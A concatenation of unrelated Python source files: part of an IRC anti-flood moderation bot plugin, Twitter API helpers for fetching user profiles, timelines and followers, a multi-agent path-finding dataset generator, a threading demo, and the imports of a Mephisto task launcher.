# elif chan.logs[key].timeout != life:
# chan.logs[key].setTimeout(life)
# logs = chan.logs[key]
# flag = False
# pattern = ''
# for m in logs:
# if compareString(m,msg.nick) > trigger:
# flag = True
# p = largestString(m,msg.nick)
# if len(p) > len(pattern):
# pattern = p
# if flag and len(pattern) > length and not 'Guest' in pattern:
# b = self.isBadOnChannel(irc,channel,key,pattern)
# if b:
# if not mask in flags:
# flags.append(mask)
# self.logChannel(irc,'NOTE: [%s] %s (%s)' % (channel,b,pattern))
# logs.enqueue(msg.nick)
## massJoin similar gecos
# life = self.registryValue('massJoinGecosLife',channel=channel)
# limit = self.registryValue('massJoinGecosPermit',channel=channel)
# if limit > -1:
# key = 'massJoinGecos'
# if not key in chan.logs:
# chan.logs[key] = utils.structures.TimeoutQueue(life)
# elif chan.logs[key].timeout != life:
# chan.logs[key].setTimeout(life)
# logs = chan.logs[key]
# flag = False
# pattern = ''
# for m in logs:
# if compareString(m,gecos) > trigger:
# flag = True
# p = largestString(m,gecos)
# if len(p) > len(pattern):
# pattern = p
# if flag and len(pattern) > length:
# b = self.isBadOnChannel(irc,channel,key,pattern)
# if b:
# if not mask in flags:
# flags.append(mask)
# self.logChannel(irc,'NOTE: [%s] %s (%s)' % (channel,b,pattern))
# logs.enqueue(gecos)
if self.hasAbuseOnChannel(irc,channel,'cycle') and self.hasAbuseOnChannel(irc,channel,'massJoinHost') and len(flags) > 0 and self.registryValue('massJoinTakeAction',channel=channel):
for u in flags:
if not u in i.klines:
self.kill(irc,msg.nick,self.registryValue('killMessage',channel=channel))
uid = random.randint(0,1000000)
self.kline(irc,msg.prefix,u,self.registryValue('klineDuration'),'%s - cycle/massJoinHost %s !dnsbl' % (uid,channel))
self.logChannel(irc,'BAD: [%s] %s (cycle/massJoinHost %s - %s)' % (channel,u,msg.prefix,uid))
def doPart (self,irc,msg):
channels = msg.args[0].split(',')
i = self.getIrc(irc)
reason = ''
if len(msg.args) == 2:
reason = msg.args[1].lstrip().rstrip()
if not ircutils.isUserHostmask(msg.prefix):
return
if msg.prefix == irc.prefix:
for channel in channels:
if ircutils.isChannel(channel):
self.setRegistryValue('lastActionTaken',time.time(),channel=channel)
self.logChannel(irc,'PART: [%s] %s' % (channel,reason))
if channel in i.channels:
del i.channels[channel]
return
mask = self.prefixToMask(irc,msg.prefix)
isBanned = False
reason = ''
if len(msg.args) == 2:
reason = msg.args[1].lstrip().rstrip()
for channel in channels:
if ircutils.isChannel(channel) and channel in irc.state.channels and not isBanned:
chan = self.getChan(irc,channel)
if msg.nick in chan.nicks:
if self.registryValue('ignoreChannel',channel):
continue
if self.registryValue('ignoreRegisteredUser',channel=channel):
if len(chan.nicks[msg.nick]) > 4:
if chan.nicks[msg.nick][4]:
continue
protected = ircdb.makeChannelCapability(channel, 'protected')
if ircdb.checkCapability(msg.prefix, protected):
continue
if reason == 'Changing Host' or i.netsplit:
continue
bad = False
if len(reason) and 'Kicked by @appservice-irc:matrix.org' in reason:
continue
flag = ircdb.makeChannelCapability(channel, 'cycle')
if ircdb.checkCapability(msg.prefix, flag):
bad = self.isBadOnChannel(irc,channel,'cycle',mask)
if bad:
self.isAbuseOnChannel(irc,channel,'cycle',mask)
if bad:
isBanned = True
uid = random.randint(0,1000000)
log = "BAD: [%s] %s (join/part - %s)" % (channel,msg.prefix,uid)
comment = '%s - join/part flood in %s' % (uid,channel)
self.ban(irc,msg.nick,msg.prefix,mask,self.registryValue('klineDuration'),comment,self.registryValue('klineMessage'),log)
self.setRegistryValue('lastActionTaken',time.time(),channel=channel)
if len(reason):
if 'Kicked by @appservice-irc:matrix.org' in reason or 'requested by' in reason:
continue
bad = self.isChannelMassRepeat(irc,msg,channel,mask,reason)
if bad:
# todo, needs to see more on that one to avoid false positive
#self.kill(irc,msg.nick,msg.prefix)
#self.kline(irc,msg.prefix,mask,self.registryValue('klineDuration'),'%s in %s' % (bad,channel))
self.logChannel(irc,"IGNORED: [%s] %s (Part's message %s) : %s" % (channel,msg.prefix,bad,reason))
if not isBanned:
life = self.registryValue('cycleLife',channel=channel)
if self.hasAbuseOnChannel(irc,channel,'cycle') and time.time() - chan.nicks[msg.nick][0] < life:
isBanned = True
uid = random.randint(0,1000000)
log = "BAD: [%s] %s (cycle abuse - %s)" % (channel,msg.prefix,uid)
comment = '%s - cycle abuse in %s' % (uid,channel)
self.ban(irc,msg.nick,msg.prefix,mask,self.registryValue('klineDuration'),comment,self.registryValue('klineMessage'),log)
self.setRegistryValue('lastActionTaken',time.time(),channel=channel)
flag = ircdb.makeChannelCapability(channel, 'joinSpamPart')
if ircdb.checkCapability(msg.prefix, flag) and not isBanned:
limit = self.registryValue('joinSpamPartPermit',channel=channel)
if limit > -1:
kind = 'joinSpamPart'
life = self.registryValue('joinSpamPartLife',channel=channel)
key = mask
if kind in chan.buffers and key in chan.buffers[kind] and len(chan.buffers[kind][key]) == limit and msg.nick in chan.nicks and time.time() - chan.nicks[msg.nick][0] < life:
self.isAbuseOnChannel(irc,channel,'joinSpamPart',mask)
if self.hasAbuseOnChannel(irc,channel,'joinSpamPart'):
uid = random.randint(0,1000000)
reason = '(%s/%ss joinSpamPart)' % (limit,life)
klinereason = '%s - %s' % (uid,reason)
if i.defcon:
klinereason = '%s !dnsbl' % reason
self.kline(irc,msg.prefix,mask,self.registryValue('klineDuration'),klinereason)
self.logChannel(irc,'BAD: [%s] %s (%s - %s)' (channel,msg.prefix,reason,uid))
isBanned = True
chan.buffers[kind][key].reset()
continue
def doKick (self,irc,msg):
channel = target = reason = None
if len(msg.args) == 3:
(channel,target,reason) = msg.args
else:
(channel,target) = msg.args
reason = ''
i = self.getIrc(irc)
if target == irc.nick:
if channel in i.channels:
self.setRegistryValue('lastActionTaken',-1.0,channel=channel)
self.logChannel(irc,'PART: [%s] %s (kicked)' % (channel,reason))
del i.channels[channel]
try:
network = conf.supybot.networks.get(irc.network)
network.channels().remove(channel)
except KeyError:
pass
def doQuit (self,irc,msg):
if msg.prefix == irc.prefix:
return
reason = ''
if len(msg.args) == 1:
reason = msg.args[0].lstrip().rstrip()
i = self.getIrc(irc)
if reason == '*.net *.split':
if not i.netsplit:
self.logChannel(irc,'INFO: netsplit activated for %ss : some abuses are ignored' % self.registryValue('netsplitDuration'))
i.netsplit = time.time() + self.registryValue('netsplitDuration')
if i.netsplit:
return
mask = self.prefixToMask(irc,msg.prefix)
isBanned = False
(nick,ident,host) = ircutils.splitHostmask(msg.prefix)
for channel in irc.state.channels:
if ircutils.isChannel(channel) and not i.netsplit:
chan = self.getChan(irc,channel)
if self.registryValue('ignoreChannel',channel):
continue
if msg.nick in chan.nicks:
if self.registryValue('ignoreRegisteredUser',channel=channel):
if len(chan.nicks[msg.nick]) > 4:
if chan.nicks[msg.nick][4]:
continue
protected = ircdb.makeChannelCapability(channel, 'protected')
if ircdb.checkCapability(msg.prefix, protected):
continue
bad = False
flag = ircdb.makeChannelCapability(channel, 'broken')
if 'tor-sasl' in mask:
continue
if ircdb.checkCapability(msg.prefix, flag):
bad = self.isBadOnChannel(irc,channel,'broken',mask)
if isBanned:
continue
if bad and not i.netsplit:
uid = random.randint(0,1000000)
self.kline(irc,msg.prefix,mask,self.registryValue('brokenDuration'),'%s - %s in %s' % (uid,'join/quit flood',channel),self.registryValue('brokenReason') % self.registryValue('brokenDuration'))
self.logChannel(irc,'BAD: [%s] %s (%s - %s)' % (channel,msg.prefix,'broken client',uid))
isBanned = True
continue
flag = ircdb.makeChannelCapability(channel, 'joinSpamPart')
if ircdb.checkCapability(msg.prefix, flag) and reason == 'Remote host closed the connection':
limit = self.registryValue('joinSpamPartPermit',channel=channel)
if limit > -1:
kind = 'joinSpamPart'
life = self.registryValue('joinSpamPartLife',channel=channel)
key = mask
if kind in chan.buffers and key in chan.buffers[kind] and len(chan.buffers[kind][key]) == limit and msg.nick in chan.nicks and time.time() - chan.nicks[msg.nick][0] < life:
self.isAbuseOnChannel(irc,channel,'joinSpamPart',mask)
if self.hasAbuseOnChannel(irc,channel,'joinSpamPart'):
uid = random.randint(0,1000000)
reason = '(%s/%ss joinSpamPart)' % (limit,life)
klinereason = '%s - %s' % (uid,reason)
if i.defcon:
klinereason = '%s !dnsbl' % reason
self.kline(irc,msg.prefix,mask,self.registryValue('klineDuration'),klinereason)
self.logChannel(irc,'BAD: [%s] %s (%s - %s)' % (channel,msg.prefix,reason,uid))
isBanned = True
chan.buffers[kind][key].reset()
continue
hosts = self.registryValue('brokenHost',channel=channel)
reasons = ['Read error: Connection reset by peer','Client Quit','Excess Flood','Max SendQ exceeded','Remote host closed the connection']
if 'broken' in chan.buffers and mask in chan.buffers['broken'] and len(chan.buffers['broken'][mask]) > 1 and reason in reasons and len(hosts):
found = False
for h in hosts:
if len(h):
if h.isdigit() and host.startswith(h):
found = True
break
if h in host:
found = True
break
if found and len(chan.nicks[msg.nick]) == 5:
gecos = chan.nicks[msg.nick][3]
account = chan.nicks[msg.nick][4]
if not account and gecos == msg.nick and gecos in ident and len(msg.nick) < 6:
isBanned = True
uid = random.randint(0,1000000)
self.kline(irc,msg.prefix,mask,self.registryValue('brokenDuration')*4,'%s - %s in %s' % (uid,'join/quit flood',channel),self.registryValue('brokenReason') % (self.registryValue('brokenDuration')*4))
self.logChannel(irc,'BAD: [%s] %s (%s - %s)' % (channel,msg.prefix,'broken bottish client',uid))
def doNick (self,irc,msg):
oldNick = msg.prefix.split('!')[0]
newNick = msg.args[0]
if oldNick == irc.nick or newNick == irc.nick:
return
newPrefix = '%s!%s' % (newNick,msg.prefix.split('!')[1])
mask = self.prefixToMask(irc,newPrefix)
i = self.getIrc(irc)
if i.netsplit:
return
isBanned = False
for channel in irc.state.channels:
if ircutils.isChannel(channel):
if self.registryValue('ignoreChannel',channel):
continue
protected = ircdb.makeChannelCapability(channel, 'protected')
if ircdb.checkCapability(newPrefix, protected):
continue
chan = self.getChan(irc,channel)
if oldNick in chan.nicks:
chan.nicks[newNick] = chan.nicks[oldNick]
# todo check digit/hexa nicks too
if not newNick.startswith('Guest'):
if not isBanned:
reason = False
if self.registryValue('ignoreRegisteredUser',channel=channel):
if newNick in chan.nicks and len(chan.nicks[newNick]) > 4 and chan.nicks[newNick][4]:
continue
flag = ircdb.makeChannelCapability(channel, 'nick')
if ircdb.checkCapability(msg.prefix, flag):
reason = self.isBadOnChannel(irc,channel,'nick',mask)
hasBeenIgnored = False
ignore = self.registryValue('ignoreDuration',channel=channel)
if ignore > 0:
ts = chan.nicks[newNick][0]
if time.time()-ts > ignore:
hasBeenIgnored = True
if not isCloaked(msg.prefix,self):
if i.defcon or chan.called:
hasBeenIgnored = False
if not reason and i.defcon and self.hasAbuseOnChannel(irc,channel,'nick'):
reason = 'nick changes, due to abuses'
if reason:
if hasBeenIgnored:
bypass = self.isBadOnChannel(irc,channel,'bypassIgnore',mask)
if bypass:
uid = random.randint(0,1000000)
comment = '%s %s' % (reason,bypass)
log = 'BAD: [%s] %s (%s - %s)' % (channel,newPrefix,comment,uid)
self.ban(irc,newNick,newPrefix,mask,self.registryValue('klineDuration'),'%s - %s' % (uid,comment),self.registryValue('klineMessage'),log)
self.setRegistryValue('lastActionTaken',time.time(),channel=channel)
isBanned = True
else:
self.logChannel(irc,'IGNORED: [%s] %s (%s)' % (channel,newPrefix,reason))
else:
uid = random.randint(0,1000000)
log = 'BAD: [%s] %s (%s - %s)' % (channel,newPrefix,reason,uid)
self.ban(irc,newNick,newPrefix,mask,self.registryValue('klineDuration'),'%s - %s' % (uid,reason),self.registryValue('klineMessage'),log)
self.setRegistryValue('lastActionTaken',time.time(),channel=channel)
isBanned = True
del chan.nicks[oldNick]
def reset(self):
self._ircs = ircutils.IrcDict()
def die(self):
self.log.info('die() called')
self.cache = {}
try:
conf.supybot.protocols.irc.throttleTime.setValue(1.6)
except:
pass
self._ircs = ircutils.IrcDict()
super().die()
def doError (self,irc,msg):
self._ircs = ircutils.IrcDict()
def makeDb(self, filename):
"""Create a database and connect to it."""
if os.path.exists(filename):
db = sqlite3.connect(filename,timeout=10)
db.text_factory = str
return db
db = sqlite3.connect(filename)
db.text_factory = str
c = db.cursor()
c.execute("""CREATE TABLE patterns (
id INTEGER PRIMARY KEY,
pattern VARCHAR(512) NOT NULL,
regexp INTEGER,
mini INTEGER,
life INTEGER,
operator VARCHAR(512) NOT NULL,
comment VARCHAR(512),
triggered INTEGER,
at TIMESTAMP NOT NULL,
removed_at TIMESTAMP,
removed_by VARCHAR(512)
)""")
db.commit()
c.close()
return db
def getDb(self, irc):
"""Use this to get a database for a specific irc."""
currentThread = threading.currentThread()
if irc not in self.dbCache and currentThread == world.mainThread:
self.dbCache[irc] = self.makeDb(self.makeFilename(irc))
if currentThread != world.mainThread:
db = self.makeDb(self.makeFilename(irc))
else:
db = self.dbCache[irc]
db.isolation_level = None
return db
Class = Sigyn
|
__init__.py
|
import json
import multiprocessing
import os
import requests
from requests_oauthlib import OAuth1
from time import sleep
import tweepy
def get_users_single(x,auth,output_folder):
while(True):
url=f"https://api.twitter.com/1.1/users/lookup.json?user_id={','.join([str(i) for i in x])}"
if(type(auth)==str):
headers = {"Authorization": "Bearer "+auth}
r = requests.get(url = url,headers=headers)
else:
r = requests.get(url = url, auth=auth)
if(r.status_code != 200):
print("sleeping")
url="https://api.twitter.com/1.1/application/rate_limit_status.json?resources=help,users,search,statuses"
while(True):
sleep(30)
try:
if(type(auth)==str):
headers = {"Authorization": "Bearer "+auth}
l = requests.get(url = url,headers=headers).json()
else:
l = requests.get(url = url, auth=auth).json()
if(l["resources"]["users"]["/users/lookup"]["remaining"]!=0):
break;
except:
pass;
continue;
else:
l = r.json()
return(l)
break;
def get_users_single_mp_aux(x,index,auths,output_folder):
n=100
auth=auths[index]
with open(f'{output_folder}/{index}.jsonl', 'w') as outfile:
for i in range(0,len(x),n):
json1=get_users_single(x[i:i+n],auth,output_folder)
json.dump(json1, outfile)
outfile.write('\n')
def get_users(auths,user_ids,output_folder):
if(not os.path.isdir(output_folder)):
print(f"Not a directory: {output_folder}")
return(None)
if(len(auths)==0):
return(None)
if(type(auths[0])!=str):
auths=[OAuth1(auths[i][0],auths[i][1],auths[i][2],auths[i][3]) for i in range(len(auths))]
Process_jobs = []
k=len(auths)
n=(1+len(user_ids)//k)
index=0
for i in range(0,len(user_ids),n):
p = multiprocessing.Process(target = get_users_single_mp_aux, args = (user_ids[i:i+n],index,auths,output_folder))
index+=1
Process_jobs.append(p)
p.start()
for p in Process_jobs:
p.join()
def get_timeline_single(auth,user_id=None,screen_name=None,count=200,trim_user=True,exclude_replies=False,include_rts=True,max_id=None):
l=[1]
ans=[]
while(len(l)!=0):
if(user_id is not None):
url=f"https://api.twitter.com/1.1/statuses/user_timeline.json?user_id={user_id}&count={count}&trim_user={trim_user}&exclude_replies={exclude_replies}&include_rts={include_rts}"
else:
url=f"https://api.twitter.com/1.1/statuses/user_timeline.json?screen_name={screen_name}&count={count}&trim_user={trim_user}&exclude_replies={exclude_replies}&include_rts={include_rts}"
url+="&tweet_mode=extended"
if(max_id is not None):
#print(max_id,"here")
url+=f"&max_id={max_id}"
#r = requests.get(url = url, auth=auth)
if(type(auth)==str):
headers = {"Authorization": "Bearer "+auth}
r = requests.get(url = url,headers=headers)
else:
r = requests.get(url = url, auth=auth)
#print(url)
if(r.status_code == 401):
break;
if(r.status_code != 200):
print("sleeping")
url="https://api.twitter.com/1.1/application/rate_limit_status.json?resources=help,users,search,statuses"
while(True):
sleep(30)
try:
if(type(auth)==str):
l=requests.get(url = url,headers=headers).json()
else:
l=requests.get(url = url, auth=auth).json()
if(l["resources"]["statuses"]["/statuses/user_timeline"]["remaining"]!=0):
break;
except Exception as e:
print(e)
pass;
continue;
else:
l = r.json()
ans.extend(l)
if(len(l)==0 or max_id==l[-1]["id_str"]):
break;
else:
max_id=l[-1]["id_str"]
return(ans)
def get_timeline_single_mp_aux(index,auths,users,output_folder):
auth=auths[index]
with open(f'{output_folder}/{index}.jsonl', 'w') as outfile:
for user_id in users:
try:
json1=get_timeline_single(auth=auth,user_id=user_id)
except:
sleep(30)
continue;
json.dump(json1, outfile)
outfile.write('\n')
def get_timelines(auths,users,output_folder):
if(not os.path.isdir(output_folder)):
print(f"Not a directory: {output_folder}")
return(None)
if(len(auths)==0):
return(None)
if(type(auths[0])!=str):
auths=[OAuth1(auths[i][0],auths[i][1],auths[i][2],auths[i][3]) for i in range(len(auths))]
Process_jobs = []
k=len(auths)
n=(1+len(users)//k)
index=-1
for i in range(0,len(users),n):
p = multiprocessing.Process(target = get_timeline_single_mp_aux, args = (index,auths,users[i:i+n],output_folder))
index+=1
Process_jobs.append(p)
p.start()
for p in Process_jobs:
p.join()
def get_followers_aux(auth,screen_name_or_userid,cursor=-1,use_userid=False):
url="https://api.twitter.com/1.1/followers/ids.json"
params={"screen_name":screen_name_or_userid,"count":"5000","cursor":cursor}
if(use_userid):
params={"user_id":screen_name_or_userid,"count":"5000","cursor":cursor}
if(type(auth)==str):
headers = {"Authorization": "Bearer "+auth}
temp=requests.get(url=url,headers=headers,params=params).json()
else:
temp=requests.get(url=url,auth=auth,params=params).json()
if(len(temp["ids"])==0):
return(temp["ids"],None)
else:
return(temp["ids"],temp["next_cursor"])
def get_followers(auths,screen_name_or_userid,max_num=-1,use_userid=False):
cursor=-1
if(len(auths)==0):
return(None)
if(type(auths[0])!=str):
auths=[OAuth1(auths[i][0],auths[i][1],auths[i][2],auths[i][3]) for i in range(len(auths))]
res=[]
index=0
auth=auths[index]
flag=False
while(cursor is not None and (max_num==-1 or max_num>len(res))):
try:
a,cursor=get_followers_aux(auth,screen_name_or_userid,cursor,use_userid)
flag=False
res.extend(a)
print(len(res))
except Exception as e:
print(e)
print("done",len(res))
if(flag):
sleep(30)
else:
flag=True
index+=1
index%=len(auths)
auth=auths[index]
pass;
return(res)
|
CasesGenerator.py
|
import os
import sys
import time
import yaml
import random
import signal
import argparse
import itertools
import subprocess
import numpy as np
import cv2
import scipy.io as sio
from multiprocessing import Queue, Pool, Lock, Manager, Process
from os.path import dirname, realpath, pardir
os.system("taskset -p -c 0 %d" % (os.getpid()))
# os.system("taskset -p 0xFFFFFFFF %d" % (os.getpid()))
os.system("taskset -p -c 8-15,24-31 %d" % (os.getpid()))
parser = argparse.ArgumentParser("Input width and #Agent")
parser.add_argument('--map_width', type=int, default=10)
parser.add_argument('--map_density', type=float, default=0.1)
parser.add_argument('--map_complexity', type=float, default=0.01)
parser.add_argument('--num_agents', type=int, default=4)
parser.add_argument('--num_dataset', type=int, default=30000)
args = parser.parse_args()
# set random seed
np.random.seed(1337)
def tf_index2xy(num_col, index):
Id_row = index // num_col
Id_col = np.remainder(index, num_col)
return [Id_row, Id_col]
# return Id_col, Id_row
def tf_xy2index(num_col, i, j):
return i * num_col + j
def handler(signum, frame):
raise Exception("Solution computed by CBS is timeout.")
class CasesGen:
def __init__(self, path_save, path_loadmap, size_map, map_density, map_complexity, num_agents, num_dataset):
self.size_load_map = size_map
self.path_loadmap = path_loadmap
self.map_density = map_density
self.label_density = str(map_density).split('.')[-1]
self.num_agents = num_agents
self.num_data = num_dataset
self.map_complexity = map_complexity
self.path_save = path_save
self.pair_CasesPool = []
self.createFolder()
self.PROCESS_NUMBER = 4
self.timeout = 300
self.task_queue = Queue()
def createFolder(self):
self.dirName_root = self.path_save + 'map{:02d}x{:02d}_density_p{}/{}_Agent/'.format(self.size_load_map[0],self.size_load_map[1],
self.label_density, self.num_agents)
self.dirName_input = self.dirName_root + 'input/'
self.dirName_output = self.dirName_root + 'output/'
try:
# Create target Directory
os.makedirs(self.dirName_root)
os.makedirs(self.dirName_input)
os.makedirs(self.dirName_output)
print("Directory ", self.dirName_root, " Created ")
except FileExistsError:
# print("Directory ", dirName, " already exists")
pass
try:
# Create target Directory
os.makedirs(self.dirName_input)
os.makedirs(self.dirName_output)
print("Directory ", self.dirName_root, " Created ")
except FileExistsError:
# print("Directory ", dirName, " already exists")
pass
def search_Cases(self, dir):
# make a list of file name of input yaml
list_path = []
assert os.path.isdir(dir), '%s is not a valid directory' % dir
for root, _, fnames in sorted(os.walk(dir)):
for fname in fnames:
if self.is_target_file(fname):
path = os.path.join(root, fname)
list_path.append(path)
return list_path
def is_target_file(self, filename):
DATA_EXTENSIONS = ['.yaml']
return any(filename.endswith(extension) for extension in DATA_EXTENSIONS)
def mapGen(self, width=10, height=10, complexity=0.01, density=0.1):
# Only odd shapes
# world_size = ((height // 2) * 2 + 1, (width // 2) * 2 + 1)
# world_size = ((height // 2) * 2 , (width // 2) * 2 )
world_size = (height, width)
# Adjust complexity and density relative to maze size
# number of components
complexity = int(complexity * (5 * (world_size[0] + world_size[1])))
# size of components
density = int(density * ((world_size[0] // 2) * (world_size[1] // 2)))
# density = int(density * world_size[0] * world_size[1])
# Build actual maze
maze = np.zeros(world_size, dtype=np.int64)
# Make aisles
for i in range(density):
# x, y = np.random.randint(0, world_size[1]), np.random.randint(0, world_size[0])
# pick a random position
x, y = np.random.randint(0, world_size[1] // 2) * 2, np.random.randint(0, world_size[0] // 2) * 2
maze[y, x] = 1
for j in range(complexity):
neighbours = []
if x > 1: neighbours.append((y, x - 2))
if x < world_size[1] - 2: neighbours.append((y, x + 2))
if y > 1: neighbours.append((y - 2, x))
if y < world_size[0] - 2: neighbours.append((y + 2, x))
if len(neighbours):
y_, x_ = neighbours[np.random.randint(0, len(neighbours) - 1)]
if maze[y_, x_] == 0:
maze[y_, x_] = 1
maze[y_ + (y - y_) // 2, x_ + (x - x_) // 2] = 1
x, y = x_, y_
# print(np.count_nonzero(maze))
return maze
def img_fill(self, im_in, n): # n = binary image threshold
th, im_th = cv2.threshold(im_in, n, 1, cv2.THRESH_BINARY)
# Copy the thresholded image.
im_floodfill = im_th.copy()
# Mask used to flood filling.
# Notice the size needs to be 2 pixels than the image.
h, w = im_th.shape[:2]
mask = np.zeros((h + 2, w + 2), np.uint8)
# Floodfill from point (0, 0)
cv2.floodFill(im_floodfill, mask, (0, 0), 255)
# Invert floodfilled image
im_floodfill_inv = cv2.bitwise_not(im_floodfill)
# print(im_floodfill_inv)
# Combine the two images to get the foreground.
fill_image = im_th | im_floodfill_inv
return fill_image
def setup_cases(self, id_random_case):
# Generate only one random unique cases in unique map
map_env_raw = self.mapGen(width=self.size_load_map[0], height=self.size_load_map[1], complexity=self.map_complexity, density=self.map_density)
self.size_load_map = np.shape(map_env_raw)
# use flood-fill to ensure the connectivity of node in maze
map_env = self.img_fill(map_env_raw.astype(np.uint8), 0.5)
array_freespace = np.argwhere(map_env == 0)
num_freespace = array_freespace.shape[0]
array_obstacle = np.transpose(np.nonzero(map_env))
num_obstacle = array_obstacle.shape[0]
print("###### Check Map Size: [{},{}]- density: {} - Actual [{},{}] - #Obstacle: {}".format(self.size_load_map[0], self.size_load_map[1],
self.map_density, self.size_load_map[0],self.size_load_map[1],
num_obstacle))
list_freespace = []
list_obstacle = []
# transfer into list (tuple)
for id_FS in range(num_freespace):
list_freespace.append((array_freespace[id_FS, 0], array_freespace[id_FS, 1]))
for id_Obs in range(num_obstacle):
list_obstacle.append((array_obstacle[id_Obs, 0], array_obstacle[id_Obs, 1]))
pair_CaseSet = []
for id_agents in range(self.num_agents):
ID_cases_agent = random.sample(list_freespace, 2)
pair_CaseSet.append(ID_cases_agent)
pair_agent = list(itertools.combinations(range(self.num_agents), 2))
check_condition = []
for id_pairagent in range(len(pair_agent)):
firstAgent = pair_agent[id_pairagent][0]
secondAgent = pair_agent[id_pairagent][1]
# print("pair", pairset)
if pair_CaseSet[firstAgent][0] == pair_CaseSet[secondAgent][0] or pair_CaseSet[firstAgent][1] == \
pair_CaseSet[secondAgent][1]:
print("Remove pair \t", pair_CaseSet)
check_condition.append(0)
else:
check_condition.append(1)
# pairStore.append(pairset)
# todo: generate n-agent pair start-end position - start from single agent CBS
# todo: non-swap + swap
if sum(check_condition) == len(pair_agent):
# print("Add {}-case: {}".format(id_random_case,pair_CaseSet))
# self.pair_CasesPool.append(pair_CaseSet)
# return True, pair_CaseSet, map_env
return True, pair_CaseSet, list_obstacle
else:
print("Remove cases ID-{}:\t {}".format(id_random_case, pair_CaseSet))
return False, [],[]
def setup_CasePool(self):
pairStore = []
mapStore = []
num_data_exceed = int(self.num_data * 2)
for id_random_case in range(num_data_exceed):
Check_add_item, pair_CaseSet, map_env = self.setup_cases(id_random_case)
if Check_add_item:
pairStore.append(pair_CaseSet)
mapStore.append(map_env)
# [k for k in d if not d[k]]
for initialCong in pairStore:
count_repeat = pairStore.count(initialCong)
if count_repeat > 1:
id_repeat = pairStore.index(initialCong)
pairStore.remove(initialCong)
map_toRemoved = mapStore[id_repeat[0]]
mapStore.remove(map_toRemoved)
print('Repeat cases ID:{} \n{} \nObstacle list: \n{} '.format(id_repeat,pairStore[id_repeat],map_toRemoved))
CasePool = list(zip(pairStore, mapStore))
random.shuffle(CasePool)
random.shuffle(CasePool)
pairPool, mapPool = zip(*CasePool)
self.save_CasePool(pairPool,mapPool)
# self.save_Pair(pairStore)
def save_CasePool(self,pairPool,mapPool):
for id_case in range(len(pairPool)):
inputfile_name = self.dirName_input + \
'input_map{:02d}x{:02d}_ID{:05d}.yaml'.format(self.size_load_map[0], self.size_load_map[1],id_case)
self.dump_yaml(self.num_agents, self.size_load_map[0], self.size_load_map[1],
pairPool[id_case], mapPool[id_case], inputfile_name)
def dump_yaml(self, num_agent, map_width, map_height, agents, obstacle_list, filename):
f = open(filename, 'w')
f.write("map:\n")
f.write(" dimensions: {}\n".format([map_width, map_height]))
f.write(" obstacles:\n")
for id_Obs in range(len(obstacle_list)):
f.write(" - [{}, {}]\n".format(obstacle_list[id_Obs][0],obstacle_list[id_Obs][1]))
f.write("agents:\n")
for n in range(num_agent):
# f.write(" - name: agent{}\n start: {}\n goal: {}\n".format(n, agents[n][0], agents[n][1]))
# f.write(" - name: agent{}\n start: {}\n goal: {}\n".format(n, agents[n]['start'], agents[n]['goal']))
f.write(" - name: agent{}\n start: [{}, {}]\n goal: [{}, {}]\n".format(n, agents[n][0][0], agents[n][0][1],
agents[n][1][0], agents[n][1][1]))
f.close()
def computeSolution(self):
self.list_Cases_input = self.search_Cases(self.dirName_input)
self.len_pair = len(self.list_Cases_input)
for id_case in range(self.len_pair):
self.task_queue.put(id_case)
time.sleep(0.3)
processes = []
for i in range(self.PROCESS_NUMBER):
# Run Multiprocesses
p = Process(target=self.compute_thread, args=(str(i)))
processes.append(p)
[x.start() for x in processes]
def compute_thread(self, thread_id):
while True:
try:
# print(thread_id)
id_case = self.task_queue.get(block=False)
print('thread {} get task:{}'.format(thread_id,id_case))
self.runExpertSolver(id_case)
# print('thread {} finish task:{}'.format(thread_id, id_case))
except:
# print('thread {} no task, exit'.format(thread_id))
return
def runExpertSolver(self, id_case):
signal.signal(signal.SIGALRM, handler)
signal.alarm(self.timeout)
try:
# load
name_inputfile = self.list_Cases_input[id_case]
id_input_case = name_inputfile.split('_ID')[-1]
name_outputfile = self.dirName_output + 'output_map{:02d}x{:02d}_ID{}.yaml'.format(self.size_load_map[0], self.size_load_map[1], id_input_case)
command_dir = dirname(realpath(__file__))
# print(command_dir)
# command_dir = '/local/scratch/ql295/Data/Project/GraphNeural_Planner/onlineExpert'
command_file = os.path.join(command_dir, "ecbs")
# run ECBS
subprocess.call(
[command_file,
"-i", name_inputfile,
"-o", name_outputfile,
"-w", str(1.1)],
cwd=command_dir)
log_str = 'map{:02d}x{:02d}_{}Agents_#{}'.format(self.size_load_map[0], self.size_load_map[1], self.num_agents, id_input_case)
print('############## Find solution for {} generated ###############'.format(log_str))
with open(name_outputfile) as output_file:
return yaml.safe_load(output_file)
except Exception as e:
print(e)
if __name__ == '__main__':
# path_loadmap = '/homes/ql295/PycharmProjects/GraphNeural_Planner/ExpertPlanner/MapDataset'
# path_loadmap = '/homes/ql295/Documents/Graph_mapf_dataset/setup/map/'
# path_savedata = '/homes/ql295/Documents/Graph_mapf_dataset/solution/'
# path_savedata = '/local/scratch/ql295/Data/MultiAgentDataset/SolutionTri_ECBS/'
path_loadmap = ''
path_savedata = '/local/scratch/ql295/Data/MultiAgentDataset/Solution_DMap/'
# num_dataset = 10 #16**2
# size_map = (5, 5)
size_map = (args.map_width, args.map_width)
map_density = args.map_density
map_complexity = args.map_complexity
num_agents = args.num_agents
num_dataset = args.num_dataset
dataset = CasesGen(path_savedata, path_loadmap, size_map, map_density, map_complexity, num_agents, num_dataset)
timeout = 300
dataset.setup_CasePool()
time.sleep(10)
dataset.computeSolution()
|
main_thread.py
|
import threading
import time
def myChildThread():
print('Child Thread Starting')
time.sleep(5)
print('Current Thread ------')
print(threading.current_thread())
print('---------------------')
print('Main Thread ---------')
print(threading.main_thread())
print('---------------------')
print('Child Thread Ending')
child = threading.Thread(target=myChildThread)
child.start()
child.join()
'''
Child Thread Starting
Current Thread ------
<Thread(Thread-1 (myChildThread), started 123145577377792)>
---------------------
Main Thread ---------
<_MainThread(MainThread, started 4534658496)>
---------------------
Child Thread Ending
'''
|
task_launcher.py
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from mephisto.data_model.assignment import (
Assignment,
InitializationData,
AssignmentState,
)
from mephisto.data_model.unit import (
Unit,
SCREENING_UNIT_INDEX,
GOLD_UNIT_INDEX,
COMPENSATION_UNIT_INDEX,
)
from typing import Dict, Optional, List, Any, TYPE_CHECKING, Iterator, Iterable
from tqdm import tqdm # type: ignore
import os
import time
import enum
if TYPE_CHECKING:
from mephisto.data_model.task_run import TaskRun
from mephisto.abstractions.database import MephistoDB
import threading
from mephisto.utils.logger_core import get_logger
import types
logger = get_logger(name=__name__)
